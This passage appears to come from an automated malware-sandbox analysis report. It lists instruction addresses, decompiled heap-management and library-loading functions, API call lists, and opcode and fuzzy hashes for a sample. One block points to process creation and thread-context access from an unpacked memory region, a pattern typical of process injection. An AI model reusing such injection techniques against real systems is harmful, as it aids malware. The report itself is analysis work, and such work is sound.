                                                                    0x00401dc3
                                                                    0x00401dca
                                                                    0x00401dd1
                                                                    0x00401dd5
                                                                    0x00401dd9
                                                                    0x00401ddd
                                                                    0x00401de1
                                                                    0x00401de5
                                                                    0x00401de9
                                                                    0x00401ded
                                                                    0x00401df1
                                                                    0x00401df5
                                                                    0x00401df9
                                                                    0x00401dfd
                                                                    0x00401e01
                                                                    0x00401e05
                                                                    0x00401e09
                                                                    0x00401e0d
                                                                    0x00401e11
                                                                    0x00401e15
                                                                    0x00401e19
                                                                    0x00401e1d
                                                                    0x00401e21
                                                                    0x00401e25
                                                                    0x00401e29
                                                                    0x00401e2d
                                                                    0x00401e31
                                                                    0x00401e35
                                                                    0x00401e39
                                                                    0x00401e3d
                                                                    0x00401e41
                                                                    0x00401e45
                                                                    0x00401e49
                                                                    0x00401e4d
                                                                    0x00401e51
                                                                    0x00401e55
                                                                    0x00401e59
                                                                    0x00401e5d
                                                                    0x00401e61
                                                                    0x00401e65
                                                                    0x00401e69
                                                                    0x00401e6d
                                                                    0x00401e71
                                                                    0x00401e75
                                                                    0x00401e79
                                                                    0x00401e7d
                                                                    0x00401e81
                                                                    0x00401e85
                                                                    0x00401e89
                                                                    0x00401e8d
                                                                    0x00401e91
                                                                    0x00401e95
                                                                    0x00401e99
                                                                    0x00401e9d
                                                                    0x00401ea1
                                                                    0x00401ea5
                                                                    0x00401ea9
                                                                    0x00401ead
                                                                    0x00401eb1
                                                                    0x00401eb5
                                                                    0x00401eb9
                                                                    0x00401ebd
                                                                    0x00401ec1
                                                                    0x00401ec5
                                                                    0x00401ec9
                                                                    0x00401ecd
                                                                    0x00401ed1
                                                                    0x00401ed5
                                                                    0x00401ed9
                                                                    0x00401edd
                                                                    0x00401ee1
                                                                    0x00401ee5
                                                                    0x00401ee9
                                                                    0x00401eed
                                                                    0x00401ef1
                                                                    0x00401ef5
                                                                    0x00401ef9
                                                                    0x00401efd
                                                                    0x00401f01
                                                                    0x00401f05
                                                                    0x00401f09
                                                                    0x00401f0d
                                                                    0x00401f11
                                                                    0x00401f15
                                                                    0x00401f19
                                                                    0x00401f1d
                                                                    0x00401f21
                                                                    0x00401f25
                                                                    0x00401f29
                                                                    0x00401f2d
                                                                    0x00401f31
                                                                    0x00401f35
                                                                    0x00401f39
                                                                    0x00401f3d
                                                                    0x00401f41
                                                                    0x00401f45
                                                                    0x00401f49
                                                                    0x00401f4d
                                                                    0x00401f51
                                                                    0x00401f55
                                                                    0x00401f59
                                                                    0x00401f5d
                                                                    0x00401f61
                                                                    0x00401f65
                                                                    0x00401f69
                                                                    0x00401f6d
                                                                    0x00401f71
                                                                    0x00401f75
                                                                    0x00401f79
                                                                    0x00401f7d
                                                                    0x00401f81
                                                                    0x00401f85
                                                                    0x00401f89
                                                                    0x00401f8d
                                                                    0x00401f91
                                                                    0x00401f95
                                                                    0x00401f99
                                                                    0x00401f9d
                                                                    0x00401fa1
                                                                    0x00401fa5
                                                                    0x00401fa9
                                                                    0x00401fad
                                                                    0x00401fb1
                                                                    0x00401fb5
                                                                    0x00401fb9
                                                                    0x00401fbd
                                                                    0x00401fc1
                                                                    0x00401fc5
                                                                    0x00401fc9
                                                                    0x00401fcd
                                                                    0x00401ff4
                                                                    0x00401ffd

                                                                    APIs
                                                                    • GetDC.USER32(00000000), ref: 00401FED
                                                                    • GrayStringW.USER32(00000000), ref: 00401FF4
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.340723744.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.340717496.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.340734243.0000000000405000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.340741211.0000000000406000.00000004.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: GrayString
                                                                    • String ID: $!$#$$$$$($($($*$*$*$+$+$+$0$0$0$0$2$2$2$2$3$3$3$3$3$4$4$8$;$;$<$<$<$<$>$@$@$@$@$@$@$@$@$A$A$C$C$D$E$E$E$E$E$E$E$E$E$E$E$F$F$F$G$H$H$H$M$M$N$P$P$P$P$P$P$P$P$P$P$P$Q$Q$Q$S$S$S$S$S$S$S$S$S$S$T$U$U$U$U$U$U$U$U$U$U$U$U$U$U$U$U$V$V$V$V$V$V$V$V$V$V$V$W$W$W$W$W$W$W$X$Y$Y$[$[$\$]$]$]$]$]$]$^$^$^$^$_$_$_$a$d$e$g$h$h$h$h$h$h$h$h$h$h$h$h$i$j$j$j$j$j$p$p$r$r$r$t$t$t$t$u$u$u$u$u$u$u$u$u$u$x$y$}$~$~
                                                                    • API String ID: 215530525-3245139904
                                                                    • Opcode ID: a529573dfcdcbef6e062d2c407cdd165618c508a2b72e946e243a5b0c1205a67
                                                                    • Instruction ID: 226ef0d03319a4da0f15562ba653300554eabad44b61a717781ff672fc057b4f
                                                                    • Opcode Fuzzy Hash: a529573dfcdcbef6e062d2c407cdd165618c508a2b72e946e243a5b0c1205a67
                                                                    • Instruction Fuzzy Hash: 46B2191091CBEAC8DB32827C5C587CEAE611B27325F5843C9D1F83A2D2C7B50B95DB66
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • CreateProcessW.KERNELBASE(?,00000000), ref: 021C127E
                                                                    • GetThreadContext.KERNELBASE(?,00010007), ref: 021C129E
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.341132647.00000000021C0000.00000040.00000001.sdmp, Offset: 021C0000, based on PE: false
                                                                    Similarity
                                                                    • API ID: ContextCreateProcessThread
                                                                    • String ID:
                                                                    • API String ID: 2843130473-0
                                                                    • Opcode ID: 6aac6d4706af8862cce15ca18613deb69fe57da59ff6ce81f2af59686110bf29
                                                                    • Instruction ID: 998b2614cae969d950ed3d07e4c11ce65b684077c2225df78c4520a1ddc7546d
                                                                    • Opcode Fuzzy Hash: 6aac6d4706af8862cce15ca18613deb69fe57da59ff6ce81f2af59686110bf29
                                                                    • Instruction Fuzzy Hash: 3ED13835A80219EFEF15CF94CD85FADBBB5BF19309F244059E51ABA292D770AA40CF10
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E00403C2F() {
                                                                    				signed int _t15;
                                                                    				void* _t17;
                                                                    				void* _t19;
                                                                    				void* _t25;
                                                                    				signed int _t26;
                                                                    				void* _t27;
                                                                    				intOrPtr* _t29;
                                                                    
                                                                    				_t15 =  *0x40656c; // 0x1
                                                                    				_t26 =  *0x40655c; // 0x10
                                                                    				if(_t15 != _t26) {
                                                                    					L3:
                                                                    					_t27 =  *0x406570; // 0x22605a8
                                                                    					_t29 = _t27 + (_t15 + _t15 * 4) * 4;
                                                                    					_t17 = RtlAllocateHeap( *0x406574, 8, 0x41c4); // executed
                                                                    					 *(_t29 + 0x10) = _t17;
                                                                    					if(_t17 == 0) {
                                                                    						L6:
                                                                    						return 0;
                                                                    					}
                                                                    					_t19 = VirtualAlloc(0, 0x100000, 0x2000, 4); // executed
                                                                    					 *(_t29 + 0xc) = _t19;
                                                                    					if(_t19 != 0) {
                                                                    						 *(_t29 + 8) =  *(_t29 + 8) | 0xffffffff;
                                                                    						 *_t29 = 0;
                                                                    						 *((intOrPtr*)(_t29 + 4)) = 0;
                                                                    						 *0x40656c =  *0x40656c + 1;
                                                                    						 *( *(_t29 + 0x10)) =  *( *(_t29 + 0x10)) | 0xffffffff;
                                                                    						return _t29;
                                                                    					}
                                                                    					HeapFree( *0x406574, 0,  *(_t29 + 0x10));
                                                                    					goto L6;
                                                                    				}
                                                                    				_t2 = _t26 * 4; // 0x60
                                                                    				_t25 = HeapReAlloc( *0x406574, 0,  *0x406570, _t26 + _t2 + 0x50 << 2);
                                                                    				if(_t25 == 0) {
                                                                    					goto L6;
                                                                    				}
                                                                    				 *0x40655c =  *0x40655c + 0x10;
                                                                    				 *0x406570 = _t25;
                                                                    				_t15 =  *0x40656c; // 0x1
                                                                    				goto L3;
                                                                    			}










                                                                    0x00403c2f
                                                                    0x00403c34
                                                                    0x00403c40
                                                                    0x00403c72
                                                                    0x00403c72
                                                                    0x00403c88
                                                                    0x00403c8b
                                                                    0x00403c93
                                                                    0x00403c96
                                                                    0x00403cc2
                                                                    0x00000000
                                                                    0x00403cc2
                                                                    0x00403ca5
                                                                    0x00403cad
                                                                    0x00403cb0
                                                                    0x00403cc6
                                                                    0x00403cca
                                                                    0x00403ccc
                                                                    0x00403ccf
                                                                    0x00403cd8
                                                                    0x00000000
                                                                    0x00403cdb
                                                                    0x00403cbc
                                                                    0x00000000
                                                                    0x00403cbc
                                                                    0x00403c42
                                                                    0x00403c57
                                                                    0x00403c5f
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00403c61
                                                                    0x00403c68
                                                                    0x00403c6d
                                                                    0x00000000

                                                                    APIs
                                                                    • HeapReAlloc.KERNEL32(00000000,00000060,00000000,00000000,004039F7,00000000,?,?,?,004020CA), ref: 00403C57
                                                                    • RtlAllocateHeap.NTDLL(00000008,000041C4,00000000,00000000,004039F7,00000000,?,?,?,004020CA), ref: 00403C8B
                                                                    • VirtualAlloc.KERNELBASE(00000000,00100000,00002000,00000004,?,004020CA), ref: 00403CA5
                                                                    • HeapFree.KERNEL32(00000000,?,?,004020CA), ref: 00403CBC
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.340723744.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.340717496.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.340734243.0000000000405000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.340741211.0000000000406000.00000004.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: Heap$Alloc$AllocateFreeVirtual
                                                                    • String ID:
                                                                    • API String ID: 1005975451-0
                                                                    • Opcode ID: b14f3b215edd06dfa11e0f270abd8e093ca8f3bed7d9b9ff123f2dd69fc0b121
                                                                    • Instruction ID: b2c5fa89e0eb3f51598bde31c379c17e434c251cd55b01d7361894cd244b5741
                                                                    • Opcode Fuzzy Hash: b14f3b215edd06dfa11e0f270abd8e093ca8f3bed7d9b9ff123f2dd69fc0b121
                                                                    • Instruction Fuzzy Hash: 15113771600600AFD7218F28FE49D267BB6FB857917114A3AF152E62E4D3319822CF48
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E00402C00(intOrPtr _a4) {
                                                                    				void* _t6;
                                                                    				void* _t9;
                                                                    
                                                                    				_t6 = HeapCreate(0 | _a4 == 0x00000000, 0x1000, 0); // executed
                                                                    				 *0x406574 = _t6;
                                                                    				if(_t6 == 0) {
                                                                    					L3:
                                                                    					return 0;
                                                                    				} else {
                                                                    					if(E00403592() != 0) {
                                                                    						_t9 = 1;
                                                                    						return _t9;
                                                                    					} else {
                                                                    						HeapDestroy( *0x406574);
                                                                    						goto L3;
                                                                    					}
                                                                    				}
                                                                    			}





                                                                    0x00402c11
                                                                    0x00402c19
                                                                    0x00402c1e
                                                                    0x00402c35
                                                                    0x00402c37
                                                                    0x00402c20
                                                                    0x00402c27
                                                                    0x00402c3a
                                                                    0x00402c3b
                                                                    0x00402c29
                                                                    0x00402c2f
                                                                    0x00000000
                                                                    0x00402c2f
                                                                    0x00402c27

                                                                    APIs
                                                                    • HeapCreate.KERNELBASE(00000000,00001000,00000000,004020B8,00000001), ref: 00402C11
                                                                      • Part of subcall function 00403592: HeapAlloc.KERNEL32(00000000,00000140,00402C25), ref: 0040359F
                                                                    • HeapDestroy.KERNEL32 ref: 00402C2F
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.340723744.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.340717496.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.340734243.0000000000405000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.340741211.0000000000406000.00000004.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: Heap$AllocCreateDestroy
                                                                    • String ID:
                                                                    • API String ID: 2236781399-0
                                                                    • Opcode ID: bc5e44137ce65289b8e1dcce8f8d315b0b7bf4eca14613293eaa72fee1890c52
                                                                    • Instruction ID: 2c5e1556da94527a30ceb9cff86543d470025539680dbd8358bd1ae6880008e2
                                                                    • Opcode Fuzzy Hash: bc5e44137ce65289b8e1dcce8f8d315b0b7bf4eca14613293eaa72fee1890c52
                                                                    • Instruction Fuzzy Hash: 0FE01270655300BEFB101B30BF09B6F3AE8AB487C2F008836B506E41E4E7B489909918
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • ExitProcess.KERNEL32(00000000,00028400,00028400,00028400), ref: 021C0BD9
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.341132647.00000000021C0000.00000040.00000001.sdmp, Offset: 021C0000, based on PE: false
                                                                    Similarity
                                                                    • API ID: ExitProcess
                                                                    • String ID:
                                                                    • API String ID: 621844428-0
                                                                    • Opcode ID: e3e1e0376983d29c41e9f1ea22d2e09707aa7033afff432d298dee813e01029d
                                                                    • Instruction ID: edb0d6ab027d903d357f068f508199a9e00b21e1921f17d8bdb8177fd38f5599
                                                                    • Opcode Fuzzy Hash: e3e1e0376983d29c41e9f1ea22d2e09707aa7033afff432d298dee813e01029d
                                                                    • Instruction Fuzzy Hash: 4A41B519A94348EDDB60DBE4F851BBDB7B1AF48B10F20540BE908EE2E0E3750D91D749
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E00403CE0(void* __ecx, intOrPtr _a4) {
                                                                    				intOrPtr _v8;
                                                                    				signed int _t45;
                                                                    				intOrPtr _t48;
                                                                    				signed int _t49;
                                                                    				intOrPtr _t51;
                                                                    				intOrPtr _t52;
                                                                    				intOrPtr _t53;
                                                                    				signed int _t54;
                                                                    				intOrPtr* _t55;
                                                                    				signed int _t57;
                                                                    				intOrPtr _t60;
                                                                    				intOrPtr _t61;
                                                                    				intOrPtr _t62;
                                                                    				void* _t69;
                                                                    				void* _t70;
                                                                    				void* _t77;
                                                                    				signed int _t78;
                                                                    				intOrPtr _t81;
                                                                    
                                                                    				_t60 = _a4;
                                                                    				_t81 =  *((intOrPtr*)(_t60 + 0x10));
                                                                    				_t45 =  *(_t60 + 8);
                                                                    				_t57 = 0;
                                                                    				while(_t45 >= 0) {
                                                                    					_t45 = _t45 << 1;
                                                                    					_t57 = _t57 + 1;
                                                                    				}
                                                                    				_t69 = 0x3f;
                                                                    				_t48 = _t57 * 0x204 + _t81 + 0x144;
                                                                    				_v8 = _t48;
                                                                    				do {
                                                                    					 *((intOrPtr*)(_t48 + 8)) = _t48;
                                                                    					 *((intOrPtr*)(_t48 + 4)) = _t48;
                                                                    					_t48 = _t48 + 8;
                                                                    					_t69 = _t69 - 1;
                                                                    				} while (_t69 != 0);
                                                                    				_t77 = (_t57 << 0xf) +  *((intOrPtr*)(_t60 + 0xc));
                                                                    				_t49 = VirtualAlloc(_t77, 0x8000, 0x1000, 4); // executed
                                                                    				if(_t49 != 0) {
                                                                    					_t70 = _t77 + 0x7000;
                                                                    					if(_t77 <= _t70) {
                                                                    						_t55 = _t77 + 0x10;
                                                                    						do {
                                                                    							 *(_t55 - 8) =  *(_t55 - 8) | 0xffffffff;
                                                                    							 *(_t55 + 0xfec) =  *(_t55 + 0xfec) | 0xffffffff;
                                                                    							 *((intOrPtr*)(_t55 - 4)) = 0xff0;
                                                                    							 *_t55 = _t55 + 0xffc;
                                                                    							 *((intOrPtr*)(_t55 + 4)) = _t55 - 0x1004;
                                                                    							 *((intOrPtr*)(_t55 + 0xfe8)) = 0xff0;
                                                                    							_t55 = _t55 + 0x1000;
                                                                    						} while (_t55 - 0x10 <= _t70);
                                                                    					}
                                                                    					_t61 = _t77 + 0xc;
                                                                    					_t51 = _v8 + 0x1f8;
                                                                    					_t78 = 1;
                                                                    					 *((intOrPtr*)(_t51 + 4)) = _t61;
                                                                    					 *((intOrPtr*)(_t61 + 8)) = _t51;
                                                                    					_t62 = _t70 + 0xc;
                                                                    					 *((intOrPtr*)(_t51 + 8)) = _t62;
                                                                    					 *((intOrPtr*)(_t62 + 4)) = _t51;
                                                                    					 *(_t81 + 0x44 + _t57 * 4) =  *(_t81 + 0x44 + _t57 * 4) & 0x00000000;
                                                                    					 *(_t81 + 0xc4 + _t57 * 4) = _t78;
                                                                    					_t52 =  *((intOrPtr*)(_t81 + 0x43));
                                                                    					_t53 = _a4;
                                                                    					 *((char*)(_t81 + 0x43)) = _t52 + 1;
                                                                    					if(_t52 == 0) {
                                                                    						 *(_t53 + 4) =  *(_t53 + 4) | _t78;
                                                                    					}
                                                                    					 *(_t53 + 8) =  *(_t53 + 8) &  !(0x80000000 >> _t57);
                                                                    					_t54 = _t57;
                                                                    				} else {
                                                                    					_t54 = _t49 | 0xffffffff;
                                                                    				}
                                                                    				return _t54;
                                                                    			}





















                                                                    0x00403ce4
                                                                    0x00403cea
                                                                    0x00403ced
                                                                    0x00403cf0
                                                                    0x00403cf2
                                                                    0x00403cf6
                                                                    0x00403cf8
                                                                    0x00403cf8
                                                                    0x00403d05
                                                                    0x00403d06
                                                                    0x00403d0d
                                                                    0x00403d10
                                                                    0x00403d10
                                                                    0x00403d13
                                                                    0x00403d16
                                                                    0x00403d19
                                                                    0x00403d19
                                                                    0x00403d23
                                                                    0x00403d31
                                                                    0x00403d39
                                                                    0x00403d43
                                                                    0x00403d4b
                                                                    0x00403d4d
                                                                    0x00403d50
                                                                    0x00403d50
                                                                    0x00403d54
                                                                    0x00403d61
                                                                    0x00403d68
                                                                    0x00403d70
                                                                    0x00403d73
                                                                    0x00403d7d
                                                                    0x00403d85
                                                                    0x00403d50
                                                                    0x00403d8c
                                                                    0x00403d8f
                                                                    0x00403d96
                                                                    0x00403d97
                                                                    0x00403d9a
                                                                    0x00403d9d
                                                                    0x00403da0
                                                                    0x00403da3
                                                                    0x00403da6
                                                                    0x00403dab
                                                                    0x00403db2
                                                                    0x00403dbb
                                                                    0x00403dbe
                                                                    0x00403dc1
                                                                    0x00403dc3
                                                                    0x00403dc3
                                                                    0x00403dd1
                                                                    0x00403dd4
                                                                    0x00403d3b
                                                                    0x00403d3b
                                                                    0x00403d3b
                                                                    0x00403dda

                                                                    APIs
                                                                    • VirtualAlloc.KERNELBASE(?,00008000,00001000,00000004,00000000,00000000,000000E0,?,?,00403A06,000000E0,00000000,?,?,?,004020CA), ref: 00403D31
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.340723744.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.340717496.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.340734243.0000000000405000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.340741211.0000000000406000.00000004.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: AllocVirtual
                                                                    • String ID:
                                                                    • API String ID: 4275171209-0
                                                                    • Opcode ID: 9d438d4134b86c2efbcaf3945f0259036a402dc27640de80926b667abbbceb32
                                                                    • Instruction ID: 1ee4e415234a1565e3cd0130980f47cc70c62d64d7dcf553b1e67335dfe42ba5
                                                                    • Opcode Fuzzy Hash: 9d438d4134b86c2efbcaf3945f0259036a402dc27640de80926b667abbbceb32
                                                                    • Instruction Fuzzy Hash: EB318B316006029FD314CF18C484BA6BBE4FF50365F2482BEE5598B2E1D774EA46CB44
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 73%
                                                                    			E00403505(signed int _a4, signed int _a8) {
                                                                    				void* _t8;
                                                                    				long _t11;
                                                                    				void* _t13;
                                                                    				long _t15;
                                                                    				void* _t17;
                                                                    				void* _t23;
                                                                    
                                                                    				_t15 = _a4 * _a8;
                                                                    				_t11 = _t15;
                                                                    				if(_t15 <= 0xffffffe0) {
                                                                    					if(_t15 == 0) {
                                                                    						_t15 = 1;
                                                                    					}
                                                                    					_t15 = _t15 + 0x0000000f & 0xfffffff0;
                                                                    				}
                                                                    				while(1) {
                                                                    					_t13 = 0;
                                                                    					if(_t15 > 0xffffffe0) {
                                                                    						goto L8;
                                                                    					}
                                                                    					_t23 = _t11 -  *0x406240; // 0x3f8
                                                                    					if(_t23 > 0) {
                                                                    						L7:
                                                                    						_t13 = HeapAlloc( *0x406574, 8, _t15);
                                                                    						if(_t13 != 0) {
                                                                    							L12:
                                                                    							return _t13;
                                                                    						}
                                                                    						goto L8;
                                                                    					}
                                                                    					E00402FC1(9);
                                                                    					_push(_t11); // executed
                                                                    					_t8 = E00403926(); // executed
                                                                    					_t13 = _t8;
                                                                    					E00403022(9);
                                                                    					_t17 = _t17 + 0xc;
                                                                    					if(_t13 != 0) {
                                                                    						E00404080(_t13, 0, _t11);
                                                                    						goto L12;
                                                                    					}
                                                                    					goto L7;
                                                                    					L8:
                                                                    					if( *0x406554 == 0) {
                                                                    						goto L12;
                                                                    					}
                                                                    					if(E0040405E(_t15) == 0) {
                                                                    						return 0;
                                                                    					}
                                                                    				}
                                                                    			}









                                                                    0x0040350c
                                                                    0x00403514
                                                                    0x00403516
                                                                    0x0040351a
                                                                    0x0040351e
                                                                    0x0040351e
                                                                    0x00403522
                                                                    0x00403522
                                                                    0x00403525
                                                                    0x00403525
                                                                    0x0040352a
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0040352c
                                                                    0x00403532
                                                                    0x00403551
                                                                    0x00403560
                                                                    0x00403564
                                                                    0x00403588
                                                                    0x00000000
                                                                    0x00403588
                                                                    0x00000000
                                                                    0x00403564
                                                                    0x00403536
                                                                    0x0040353b
                                                                    0x0040353c
                                                                    0x00403543
                                                                    0x00403545
                                                                    0x0040354a
                                                                    0x0040354f
                                                                    0x00403580
                                                                    0x00000000
                                                                    0x00403585
                                                                    0x00000000
                                                                    0x00403566
                                                                    0x0040356d
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00403578
                                                                    0x00000000
                                                                    0x0040358e
                                                                    0x0040357a

                                                                    APIs
                                                                    • HeapAlloc.KERNEL32(00000008,?,?,?,?,00402B51,00000001,00000074,?,004020CA), ref: 0040355A
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.340723744.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.340717496.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.340734243.0000000000405000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.340741211.0000000000406000.00000004.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: AllocHeap
                                                                    • String ID:
                                                                    • API String ID: 4292702814-0
                                                                    • Opcode ID: 96033c71a81d4bc925899e7ece1dd47c7d7021f592189cdb1f5a8d91f65cd873
                                                                    • Instruction ID: 610f0df8e04b7164b0698d1f2c5a8b57cbc10cfea3193bb00eb9ec1fd8239ef0
                                                                    • Opcode Fuzzy Hash: 96033c71a81d4bc925899e7ece1dd47c7d7021f592189cdb1f5a8d91f65cd873
                                                                    • Instruction Fuzzy Hash: E101F5729016203AD5217F296D41B5B2A1CDBC17A6F16063BFE54772E2E6788F0041AD
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Non-executed Functions

                                                                    C-Code - Quality: 46%
                                                                    			E00403DDB(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                    				intOrPtr* _t4;
                                                                    				intOrPtr* _t7;
                                                                    				_Unknown_base(*)()* _t11;
                                                                    				void* _t14;
                                                                    				struct HINSTANCE__* _t15;
                                                                    				void* _t17;
                                                                    
                                                                    				_t14 = 0;
                                                                    				_t17 =  *0x406548 - _t14; // 0x0
                                                                    				if(_t17 != 0) {
                                                                    					L4:
                                                                    					_t4 =  *0x40654c; // 0x0
                                                                    					if(_t4 != 0) {
                                                                    						_t14 =  *_t4();
                                                                    						if(_t14 != 0) {
                                                                    							_t7 =  *0x406550; // 0x0
                                                                    							if(_t7 != 0) {
                                                                    								_t14 =  *_t7(_t14);
                                                                    							}
                                                                    						}
                                                                    					}
                                                                    					return  *0x406548(_t14, _a4, _a8, _a12);
                                                                    				}
                                                                    				_t15 = LoadLibraryA("user32.dll");
                                                                    				if(_t15 == 0) {
                                                                    					L10:
                                                                    					return 0;
                                                                    				}
                                                                    				_t11 = GetProcAddress(_t15, "MessageBoxA");
                                                                    				 *0x406548 = _t11;
                                                                    				if(_t11 == 0) {
                                                                    					goto L10;
                                                                    				} else {
                                                                    					 *0x40654c = GetProcAddress(_t15, "GetActiveWindow");
                                                                    					 *0x406550 = GetProcAddress(_t15, "GetLastActivePopup");
                                                                    					goto L4;
                                                                    				}
                                                                    			}









                                                                    0x00403ddc
                                                                    0x00403dde
                                                                    0x00403de6
                                                                    0x00403e2a
                                                                    0x00403e2a
                                                                    0x00403e31
                                                                    0x00403e35
                                                                    0x00403e39
                                                                    0x00403e3b
                                                                    0x00403e42
                                                                    0x00403e47
                                                                    0x00403e47
                                                                    0x00403e42
                                                                    0x00403e39
                                                                    0x00000000
                                                                    0x00403e56
                                                                    0x00403df3
                                                                    0x00403df7
                                                                    0x00403e60
                                                                    0x00000000
                                                                    0x00403e60
                                                                    0x00403e05
                                                                    0x00403e09
                                                                    0x00403e0e
                                                                    0x00000000
                                                                    0x00403e10
                                                                    0x00403e1e
                                                                    0x00403e25
                                                                    0x00000000
                                                                    0x00403e25

                                                                    APIs
                                                                    • LoadLibraryA.KERNEL32(user32.dll,?,00000000,?,00402F69,?,Microsoft Visual C++ Runtime Library,00012010,?,00405368,?,004053B8,?,?,?,Runtime Error!Program: ), ref: 00403DED
                                                                    • GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 00403E05
                                                                    • GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 00403E16
                                                                    • GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 00403E23
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.340723744.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.340717496.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.340734243.0000000000405000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.340741211.0000000000406000.00000004.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: AddressProc$LibraryLoad
                                                                    • String ID: GetActiveWindow$GetLastActivePopup$MessageBoxA$user32.dll
                                                                    • API String ID: 2238633743-4044615076
                                                                    • Opcode ID: 483b65111520c63d727d1228dc1df21d4e2283ef0b4d4ef92e8523a719d25699
                                                                    • Instruction ID: f79bfe25e058f3eb4303112d28ba12920f0060c447442e98a4e600f14fe53912
                                                                    • Opcode Fuzzy Hash: 483b65111520c63d727d1228dc1df21d4e2283ef0b4d4ef92e8523a719d25699
                                                                    • Instruction Fuzzy Hash: B7017531600621ABC7109FB5ED84A5B3EDDEB88796311043BB501F2291D778C9518FA8
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.341132647.00000000021C0000.00000040.00000001.sdmp, Offset: 021C0000, based on PE: false
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: f4324828f627b6bb0fb9c77ef1135b1a25c16c170ba8a3c28242676e39d3c830
                                                                    • Instruction ID: 502822c1a1ffcf812b8767f889cb731b17ffd15366e5a6c931de18332a518dbb
                                                                    • Opcode Fuzzy Hash: f4324828f627b6bb0fb9c77ef1135b1a25c16c170ba8a3c28242676e39d3c830
                                                                    • Instruction Fuzzy Hash: 2811297AA00108EFDB14DFA9C88496DF7FDEF68654B604069E809D3300E370DE40C660
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.341132647.00000000021C0000.00000040.00000001.sdmp, Offset: 021C0000, based on PE: false
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 16547e1fdedecc12c00c52f4e517689794c9225d74c133a4488530a871c9f38f
                                                                    • Instruction ID: 4308ea624e61f026cdf142f25d242acc919cb7b44a7221fce5d2d13b9bcc518a
                                                                    • Opcode Fuzzy Hash: 16547e1fdedecc12c00c52f4e517689794c9225d74c133a4488530a871c9f38f
                                                                    • Instruction Fuzzy Hash: 9DE012397A4549DFC754CBA8C841D55B3F8EB1D760B254294FC25C73A0E734EE00DA50
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.341132647.00000000021C0000.00000040.00000001.sdmp, Offset: 021C0000, based on PE: false
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 2c0ee92d967234240d1aeaee57440cb1fca394a3c7c5a1b28cb5c43ac66d8783
                                                                    • Instruction ID: 5198b3cf3f5373ddc9f0976af6750193cd5b0b74793e332450910cf78c761e91
                                                                    • Opcode Fuzzy Hash: 2c0ee92d967234240d1aeaee57440cb1fca394a3c7c5a1b28cb5c43ac66d8783
                                                                    • Instruction Fuzzy Hash: 49E04F3A751560CFC3209A598480956F3E9EB9C2B0726547DE859D3611C330EC00CA50
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
